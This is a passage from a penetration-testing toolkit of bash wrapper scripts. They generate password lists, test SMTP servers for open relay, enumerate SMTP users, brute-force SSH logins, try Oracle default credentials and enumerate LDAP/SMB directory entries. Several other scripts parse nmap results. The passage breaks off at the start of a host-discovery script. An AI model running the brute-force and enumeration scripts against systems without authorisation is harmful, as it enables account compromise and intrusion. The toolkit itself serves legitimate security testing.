20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
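# Usage: generate-wordlist.sh <word-list-file>
# Pipes <word-list-file> through rsmangler (reading stdin via --file -) and
# writes the result to <word-list-file>_passwordlist.txt.
if [ "$#" -eq 1 ]; then
    # Redirect the file directly instead of `cat $1 |`: the path is quoted,
    # and if the input cannot be opened the shell stops before rsmangler runs
    # and before an empty output file is created.
    rsmangler --file - < "$1" > "${1}_passwordlist.txt"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide a list of words." >&2
    exit 1
fi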
29 |
--------------------------------------------------------------------------------
/cracking/open-relay-smtp.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
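# Usage: open-relay-smtp.sh <target>
# Feeds a short resource script to msfconsole on stdin (-r -) that runs the
# auxiliary/scanner/smtp/smtp_relay module against <target>.
# -n starts without a database, -q suppresses the banner.
if [ "$#" -eq 1 ]; then
    # $1 is expanded inside the here-document below, so a line break in it
    # would be read by msfconsole as an additional console command.
    case $1 in
        *$'\n'* | *$'\r'*)
            echo "Target must not contain line breaks." >&2
            exit 1
            ;;
    esac
    msfconsole -n -q -r - << EOF
use auxiliary/scanner/smtp/smtp_relay
set RHOSTS $1
run
exit
EOF
else
    # Usage errors go to stderr with a non-zero status so wrappers can tell
    # that nothing was run.
    echo "Please provide the target SMTP server." >&2
    exit 1
fi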
34 |
--------------------------------------------------------------------------------
/cracking/oracle-login.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
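# Usage: oracle-login.sh <host> <port>
# Runs patator's oracle_login module against <host>:<port> with the SecLists
# Oracle default-credential list. File 0 is read as user:password combos
# (COMBO00 = user, COMBO01 = password).
#
# NOTE(review): this block previously required three arguments and first ran
# the ssh_login command from ssh-bf.sh, which sent SSH logins to the host
# with the Oracle port as the user name. The usage text and the oracle_login
# command both take two arguments, so the ssh_login line looks like a
# copy-paste leftover and has been removed.
if [ "$#" -eq 2 ]; then
    # ORA-01017 (invalid username/password) is filtered as the expected
    # failure. ORA-28000 (account locked) is filtered too, so lockouts on the
    # database will not appear in the output; check them on the server side.
    patator oracle_login host="$1" port="$2" \
        user=COMBO00 password=COMBO01 \
        0=/usr/share/seclists/Passwords/Default-Credentials/oracle-betterdefaultpasslist.txt \
        -x ignore:code=ORA-01017 -x ignore:code=ORA-28000
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide a target host and a port." >&2
    exit 1
fi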
31 |
--------------------------------------------------------------------------------
/cracking/smtp-users-enumeration.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
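# Usage: smtp-users-enumeration.sh <target>
# Feeds a short resource script to msfconsole on stdin (-r -) that runs the
# auxiliary/scanner/smtp/smtp_enum module against <target>.
# -n starts without a database, -q suppresses the banner.
if [ "$#" -eq 1 ]; then
    # $1 is expanded inside the here-document below, so a line break in it
    # would be read by msfconsole as an additional console command.
    case $1 in
        *$'\n'* | *$'\r'*)
            echo "Target must not contain line breaks." >&2
            exit 1
            ;;
    esac
    msfconsole -n -q -r - << EOF
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS $1
run
exit
EOF
else
    # Usage errors go to stderr with a non-zero status so wrappers can tell
    # that nothing was run.
    echo "Please provide the target SMTP server." >&2
    exit 1
fi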
34 |
--------------------------------------------------------------------------------
/cracking/ssh-bf.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
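# Usage: ssh-bf.sh <host> <username> <password-list-file>
# Runs patator's ssh_login module against <host> for the single account
# <username>, taking password candidates from <password-list-file> (file 0,
# substituted where FILE0 appears).
if [ "$#" -eq 3 ]; then
    # Quote each key=value word so a host, user name or path containing
    # spaces or glob characters stays a single patator argument.
    patator ssh_login host="$1" user="$2" password=FILE0 0="$3"
else
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide a target host, a username and a password list." >&2
    exit 1
fi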
29 |
--------------------------------------------------------------------------------
/firewall/subnetslist.example:
--------------------------------------------------------------------------------
1 | 192.168.1.1/24
2 | 192.168.2.1/23
3 | 192.168.3.1/27
--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-csv.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2024 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
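24 | # Usage: grep-list-hosts-and-open-ports-to-csv.sh <directory>
25 | # Reads every *.gnmap file in <directory> and prints one line per host:
26 | #   <ip>;<port>,<port>,...,
27 | # (the trailing comma after the last port is kept from the original output).
28 | if [ "$#" -eq 1 ]; then
29 |
30 |     # grep -E replaces the obsolescent egrep; -h drops the "file:" prefix and
31 |     # "$1" is quoted, so the cut field positions do not depend on the number of
32 |     # files or on spaces in the directory name.
33 |     grep -Ehv -e "^#|Status: Up" -- "$1"/*.gnmap | cut -d' ' -f2,4- | sed 's/Ignored.*//g' | awk '{
34 |         printf "%s;", $1
35 |         # Glue fields 2..NF back together (drops the blanks after each comma).
36 |         ports = ""
37 |         for (i = 2; i <= NF; i++) ports = ports $i
38 |         # Index loop: "for (e in s)" visits entries in an unspecified order,
39 |         # which could shuffle the port list.
40 |         n = split(ports, s, ",")
41 |         for (e = 1; e <= n; e++) {
42 |             split(s[e], v, "/")
43 |             printf "%s,", v[1]
44 |         }
45 |         printf "\n"
46 |     }'
47 |
48 | else
49 |     echo "Please provide a directory path."
50 | fi
51 |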
--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-matrix.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
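24 | # Usage: grep-list-hosts-and-open-ports-to-matrix.sh <directory>
25 | # Reads every *.gnmap file in <directory> and prints one line per host:
26 | #   <ip>;<number of port entries>;<port>(<service>),<port>(<service>),...,
27 | if [ "$#" -eq 1 ]; then
28 |
29 |     # grep -E replaces the obsolescent egrep; -h drops the "file:" prefix and
30 |     # "$1" is quoted, so the cut field positions do not depend on the number of
31 |     # files or on spaces in the directory name.
32 |     grep -Ehv -e "^#|Status: Up" -- "$1"/*.gnmap | cut -d' ' -f2,4- | sed 's/Ignored.*//g' | awk '{
33 |         # Glue fields 2..NF back together (drops the blanks after each comma).
34 |         ports = ""
35 |         for (i = 2; i <= NF; i++) ports = ports $i
36 |         # Count the comma-separated entries rather than the blank-separated
37 |         # fields, so blanks inside a version string do not inflate the count.
38 |         n = split(ports, s, ",")
39 |         printf "%s;%d;", $1, n
40 |         # Index loop: "for (e in s)" visits entries in an unspecified order.
41 |         for (e = 1; e <= n; e++) {
42 |             split(s[e], v, "/")
43 |             printf "%s(%s),", v[1], v[5]
44 |         }
45 |         printf "\n"
46 |     }'
47 |
48 | else
49 |     echo "Please provide a directory path."
50 | fi
51 |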
--------------------------------------------------------------------------------
/grep/grep-list-hosts-and-open-ports-to-txt.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
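24 | # Usage: grep-list-hosts-and-open-ports-to-txt.sh <directory>
25 | # Reads every *.gnmap file in <directory> and prints, for each host, a
26 | # "Host:" line, an "Open ports:" count, one "<port><TAB><service>" line per
27 | # port entry, and a blank separator line.
28 | if [ "$#" -eq 1 ]; then
29 |
30 |     # grep -E replaces the obsolescent egrep; -h drops the "file:" prefix and
31 |     # "$1" is quoted, so the cut field positions do not depend on the number of
32 |     # files or on spaces in the directory name.
33 |     grep -Ehv -e "^#|Status: Up" -- "$1"/*.gnmap | cut -d' ' -f2,4- | sed 's/Ignored.*//g' | awk '{
34 |         # Glue fields 2..NF back together (drops the blanks after each comma).
35 |         ports = ""
36 |         for (i = 2; i <= NF; i++) ports = ports $i
37 |         # Count the comma-separated entries rather than the blank-separated
38 |         # fields, so blanks inside a version string do not inflate the count.
39 |         n = split(ports, s, ",")
40 |         printf "Host: %s\nOpen ports: %d\n", $1, n
41 |         # Index loop: "for (e in s)" visits entries in an unspecified order.
42 |         for (e = 1; e <= n; e++) {
43 |             split(s[e], v, "/")
44 |             printf "%s\t%s\n", v[1], v[5]
45 |         }
46 |         printf "\n"
47 |     }'
48 |
49 | else
50 |     echo "Please provide a directory path."
51 | fi
52 |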
--------------------------------------------------------------------------------
/grep/grep-list-hosts-open-ports-and-services-to-matrix.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
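24 | # Usage: grep-list-hosts-open-ports-and-services-to-matrix.sh <directory>
25 | # Reads every *.gnmap file in <directory> and prints one line per host:
26 | #   <ip>;<number of port entries>;<port>(<service>)[<version>],...,
27 | if [ "$#" -eq 1 ]; then
28 |
29 |     # The original globbed *.gnmap in the current directory and ignored the
30 |     # directory argument it insists on; the files are now taken from "$1".
31 |     # grep -E replaces the obsolescent egrep and -h drops the "file:" prefix.
32 |     grep -Ehv -e "^#|Status: Up" -- "$1"/*.gnmap | cut -d' ' -f2,4- | sed 's/Ignored.*//g' | awk '{
33 |         ip = $1
34 |         # Everything after the address is the port list. It is cut out of $0
35 |         # instead of being rebuilt from "_"-separated fields, so underscores and
36 |         # blanks inside a version string survive.
37 |         rest = $0
38 |         sub(/^[^ ]+ ?/, "", rest)
39 |         sub(/[ \t]+$/, "", rest)
40 |         gsub(/, /, ",", rest)
41 |         # The count is the number of port entries; the original printed NF of
42 |         # the "_"-split record, which is not the number of ports.
43 |         n = split(rest, s, ",")
44 |         printf "%s;%d;", ip, n
45 |         # Index loop: "for (e in s)" visits entries in an unspecified order.
46 |         for (e = 1; e <= n; e++) {
47 |             split(s[e], v, "/")
48 |             printf "%s(%s)[%s],", v[1], v[5], v[7]
49 |         }
50 |         printf "\n"
51 |     }'
52 |
53 | else
54 |     echo "Please provide a directory path."
55 | fi
56 |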
--------------------------------------------------------------------------------
/grep/grep-list-hosts-open-ports-and-services-to-txt.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
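24 | # Usage: grep-list-hosts-open-ports-and-services-to-txt.sh <directory>
25 | # Reads every *.gnmap file in <directory> and prints, for each host, a
26 | # "Host:" line, an "Open ports:" count, one aligned "<port> <service> <version>"
27 | # line per port entry, and a blank separator line.
28 | if [ "$#" -eq 1 ]; then
29 |
30 |     # grep -E replaces the obsolescent egrep; -h drops the "file:" prefix and
31 |     # "$1" is quoted, so the cut field positions do not depend on the number of
32 |     # files or on spaces in the directory name.
33 |     grep -Ehv -e "^#|Status: Up" -- "$1"/*.gnmap | cut -d' ' -f2,4- | sed 's/Ignored.*//g' | awk '{
34 |         ip = $1
35 |         # Everything after the address is the port list. It is cut out of $0
36 |         # instead of being rebuilt from "_"-separated fields, so underscores and
37 |         # blanks inside a version string survive.
38 |         rest = $0
39 |         sub(/^[^ ]+ ?/, "", rest)
40 |         sub(/[ \t]+$/, "", rest)
41 |         gsub(/, /, ",", rest)
42 |         # The count is the number of port entries; the original printed NF of
43 |         # the "_"-split record, which is not the number of ports.
44 |         n = split(rest, s, ",")
45 |         printf "Host: %s\nOpen ports: %d\n", ip, n
46 |         # Index loop: "for (e in s)" visits entries in an unspecified order.
47 |         for (e = 1; e <= n; e++) {
48 |             split(s[e], v, "/")
49 |             printf "%-10s%-20s%s\n", v[1], v[5], v[7]
50 |         }
51 |         printf "\n"
52 |     }'
53 | else
54 |     echo "Please provide a directory path."
55 | fi
56 |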
--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts-comma.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2019 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
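24 | # Usage: grep-unique-live-hosts-comma.sh <directory>
25 | # Prints the addresses of all hosts reported as "Status: Up" in the *.gnmap
26 | # files of <directory> as a single comma-separated line, version-sorted and
27 | # de-duplicated.
28 | if [ "$#" -eq 1 ]; then
29 |     # "$1" is quoted so a directory name with spaces or glob characters is not
30 |     # split or expanded; -- stops a leading "-" from being read as an option.
31 |     cat -- "$1"/*.gnmap | grep 'Status: Up' | cut -d ' ' -f2 | sort -V | uniq | tr '\n' ',' | sed 's/,$//g'
32 |     # tr removed every newline, so terminate the line explicitly.
33 |     echo
34 | else
35 |     echo "Please provide a directory path."
36 | fi
37 |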
--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts-having-more-than-one-port-open.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2021 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
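24 | # Usage: grep-unique-live-hosts-having-more-than-one-port-open.sh <directory>
25 | # Lists, version-sorted and de-duplicated, the addresses of hosts whose
26 | # gnmap line carries at least two port entries in an open state.
27 | if [ "$#" -eq 1 ]; then
28 |     # Match the state field itself ("/open/" or "/open|filtered/") twice.
29 |     # The original pattern "open.*open" also matched the word inside service
30 |     # or host names (for example a single open port whose service is named
31 |     # openvpn), reporting hosts with only one open port.
32 |     # "$1" is quoted so a directory name with spaces is not word-split.
33 |     cat -- "$1"/*.gnmap | grep '/open[/|].*/open[/|]' | cut -d ' ' -f2 | sort -V | uniq
34 | else
35 |     echo "Please provide a directory path."
36 | fi
37 |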
--------------------------------------------------------------------------------
/grep/grep-unique-live-hosts.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
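24 | # Usage: grep-unique-live-hosts.sh <directory>
25 | # Prints, one per line, the version-sorted and de-duplicated addresses of all
26 | # hosts reported as "Status: Up" in the *.gnmap files of <directory>.
27 | if [ "$#" -eq 1 ]; then
28 |     # "$1" is quoted so a directory name with spaces or glob characters is not
29 |     # split or expanded; -- stops a leading "-" from being read as an option.
30 |     cat -- "$1"/*.gnmap | grep 'Status: Up' | cut -d ' ' -f2 | sort -V | uniq
31 | else
32 |     echo "Please provide a directory path."
33 | fi
34 |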
--------------------------------------------------------------------------------
/grep/grep-unique-open-ports-comma.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2019 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
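24 | # Usage: grep-unique-open-ports-comma.sh <directory>
25 | # Collects the port numbers of every port entry whose state starts with
26 | # "open" in the *.gnmap files of <directory> and prints them numerically
27 | # sorted and de-duplicated as a single comma-separated line.
28 | if [ "$#" -eq 1 ]; then
29 |     # "$1" is quoted so a directory name with spaces is not word-split.
30 |     # One sed call strips leading blanks and then keeps only entries that
31 |     # contain "/open", cut down to the port number; [[:space:]] is used because
32 |     # "\t" inside a bracket expression is only a tab in GNU sed.
33 |     cat -- "$1"/*.gnmap | grep "Ports:" | cut -d' ' -f4- | tr ',' '\n' | sed -n -e 's/^[[:space:]]*//' -e 's/\/open.*//p' | sort -n | uniq | tr '\n' ',' | sed 's/,$//g'
34 |     # tr removed every newline, so terminate the line explicitly.
35 |     echo
36 | else
37 |     echo "Please provide a directory path."
38 | fi
39 |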
--------------------------------------------------------------------------------
/grep/grep-unique-open-ports.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
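24 | # Usage: grep-unique-open-ports.sh <directory>
25 | # Collects the port numbers of every port entry whose state starts with
26 | # "open" in the *.gnmap files of <directory> and prints them one per line,
27 | # numerically sorted and de-duplicated.
28 | if [ "$#" -eq 1 ]; then
29 |     # "$1" is quoted so a directory name with spaces is not word-split.
30 |     # One sed call strips leading blanks and then keeps only entries that
31 |     # contain "/open", cut down to the port number; [[:space:]] is used because
32 |     # "\t" inside a bracket expression is only a tab in GNU sed.
33 |     cat -- "$1"/*.gnmap | grep "Ports:" | cut -d' ' -f4- | tr ',' '\n' | sed -n -e 's/^[[:space:]]*//' -e 's/\/open.*//p' | sort -n | uniq
34 | else
35 |     echo "Please provide a directory path."
36 | fi
37 |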
--------------------------------------------------------------------------------
/ldap/scan-enum4linux.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
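25 | # Usage: scan-enum4linux.sh <host>
26 | # Runs enum4linux against <host> with -a -v -M -l -d and keeps a copy of
27 | # everything it prints (stdout and stderr) in enum4linux_<host>.txt in the
28 | # current directory.
29 | if [ "$#" -eq 1 ]; then
30 |     # Quoted so the host argument is passed through as one word.
31 |     enum4linux -a -v -M -l -d "$1" 2>&1 | tee "enum4linux_$1.txt"
32 | else
33 |     echo "Please provide the target host."
34 | fi
35 |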
--------------------------------------------------------------------------------
/ldap/scan-ldapsearch.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
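25 | # Usage: scan-ldapsearch.sh <host> <port> <bind-dn> <password> <base-dn>
26 | # Performs a simple-bind (-x) subtree search for every entry under <base-dn>
27 | # and saves the output, including stderr, to ldap_all-entries_<host>_<port>.txt.
28 | #
29 | # NOTE(review): the bind password is passed with -w, so it is visible in the
30 | # process list and in shell history while the command runs; ldapsearch also
31 | # accepts -W (prompt) and -y <file>. The five-argument interface is kept as is.
32 | if [ "$#" -eq 5 ]; then
33 |     # Arguments are quoted: a bind DN or base DN often contains spaces
34 |     # ("cn=Some User,dc=example,dc=com") and would otherwise be split.
35 |     # tee now gets the file name as its argument, so the result is both shown
36 |     # on the terminal and written to the file; the original "tee > file" only
37 |     # wrote the file.
38 |     ldapsearch -v -x -D "$3" -w "$4" -p "$2" -h "$1" -b "$5" -s sub "(objectclass=*)" 2>&1 | tee "ldap_all-entries_$1_$2.txt"
39 | else
40 |     echo "Please provide the target host, port, username, password and base dn(dc=example,dc=com)."
41 | fi
42 |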
--------------------------------------------------------------------------------
/live-hosts/discover-live-hosts-oses.sh:
--------------------------------------------------------------------------------
1 |
2 | #!/bin/bash
3 |
4 | # This file is part of PenTestKit
5 | # Copyright (C) 2017-2021 @maldevel
6 | # https://github.com/maldevel/PenTestKit
7 | #
8 | # PenTestKit - Useful tools for Penetration Testing.
9 | #
10 | # This program is free software: you can redistribute it and/or modify
11 | # it under the terms of the GNU General Public License as published by
12 | # the Free Software Foundation, either version 3 of the License, or
13 | # (at your option) any later version.
14 | #
15 | # This program is distributed in the hope that it will be useful,
16 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
17 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
18 | # GNU General Public License for more details.
19 | #
20 | # You should have received a copy of the GNU General Public License
21 | # along with this program. If not, see .
22 | #
23 | # For more see the file 'LICENSE' for copying permission.
24 |
25 |
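26 | # Usage: discover-live-hosts-oses.sh <target-range>   (must run as root)
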